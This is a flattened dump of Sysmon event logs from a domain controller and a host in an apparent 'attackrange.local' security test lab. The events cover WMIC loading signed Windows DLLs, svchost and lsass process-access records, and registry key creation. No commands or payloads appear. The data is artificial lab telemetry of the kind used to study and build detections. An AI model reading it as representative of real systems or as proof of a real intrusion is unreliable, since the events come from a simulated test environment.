12:18:51.705{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348465Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.705{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348464Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.689{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057348463Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.689{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKCR 12241200x800000000000000057348462Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.689{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKCR 12241200x800000000000000057348461Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.689{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKCR 12241200x800000000000000057348460Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.689{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKCR 12241200x800000000000000057348459Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.689{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKCR 12241200x800000000000000057348458Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.689{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKCR 12241200x800000000000000057348457Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.689{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKCR 12241200x800000000000000057348456Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.689{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKCR 12241200x800000000000000057348455Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.689{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKCR 12241200x800000000000000057348454Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.689{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKCR 734700x800000000000000057348453Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.689{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\wmiutils.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwmiutils.dllMD5=5179B0DEF3AB5CAC3BA02316AF1B6B40,SHA256=FA4112CB0D1A133C41FD001F958F0BE930BB49072BF97A3D765AEA8DB841ABC4trueMicrosoft WindowsValid 11241100x800000000000000057348452Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.689{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348451Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.689{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C03B227F1C9E5AEE760A5E6892BA4D0,SHA256=F6FBDCBAE58F67F60242A343A643EEAFEF83DE67E0F991447C41913B6A037A66falsetrue 734700x800000000000000057348450Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.673{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\fastprox.dll10.0.14393.0 (rs1_release.160715-1616)WMI Custom MarshallerMicrosoft® Windows® Operating SystemMicrosoft Corporationfastprox.dllMD5=C2F7834269D565263C65757EDE37A66C,SHA256=17651A35255229CE95F065CA1BCCC4867B43DA879D72AFCC91FBA4768225C7D3trueMicrosoft WindowsValid 734700x800000000000000057348449Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.673{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\wbemsvc.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemsvc.dllMD5=2BE97028B7B85762561F475E31989C2A,SHA256=75C9D8C6D41B4B7D70666A8107A08A748CEF6CB9E60AD0288B10CDE12E274AFFtrueMicrosoft WindowsValid 734700x800000000000000057348448Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.673{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\msvcr100.dll10.00.40219.1Microsoft® C Runtime LibraryMicrosoft® Visual Studio® 2010Microsoft Corporationmsvcr100_clr0400.dllMD5=DF3CA8D16BDED6A54977B30E66864D33,SHA256=1D1A1AE540BA132F998D60D3622F0297B6E86AE399332C3B47462D7C0F560A36trueMicrosoft CorporationValid 734700x800000000000000057348447Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.658{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750AtrueMicrosoft WindowsValid 10341000x800000000000000057348446Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.658{8B6011A9-886E-6164-1600-00000000F101}13166900C:\Windows\System32\svchost.exe{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348445Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.658{8B6011A9-886E-6164-1600-00000000F101}13161348C:\Windows\System32\svchost.exe{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348444Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.658{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x800000000000000057348443Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.658{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 12241200x800000000000000057348442Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.658{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348441Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.658{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348440Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348439Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348438Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348437Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348436Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348435Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348434Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348433Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348432Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348431Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057348430Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\msxml3.dll8.110.14393.4467MSXML 3.0Microsoft XML Core ServicesMicrosoft CorporationMSXML3.dllMD5=6814685E95C03FBB44F443A2E382A0BC,SHA256=01FE087FEC5C44D5DC17875038BEDCC47544F710DEB83D421A7D6DF05DA688CFtrueMicrosoft WindowsValid 12241200x800000000000000057348429Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348428Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348427Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 23542300x800000000000000021219868Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:51.345{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=700F7F0F0A30EF87CB9A6288FD4F4B1A,SHA256=760B69CE2C7142F40CF9FD6F9BA816FB90FBFB5CABC60F90B7CA21470737D05D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057348426Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348425Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348424Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348423Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348422Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348421Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348420Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348419Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348418Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348417Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348416Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.642{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348415Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057348414Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057348413Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057348412Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057348411Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057348410Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057348409Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057348408Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057348407Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057348406Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057348405Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057348404Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 12241200x800000000000000057348403Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.621{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348402Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.621{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x800000000000000057348401Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348400Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.621{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68883CA3EA28ADD612D1FA58214EDCC6,SHA256=A9E44CA2E9722A09D075D9673FBBAFB8449B23C8BB2308D03DF631B9F94D0F02falsetrue 12241200x800000000000000057348399Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348398Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 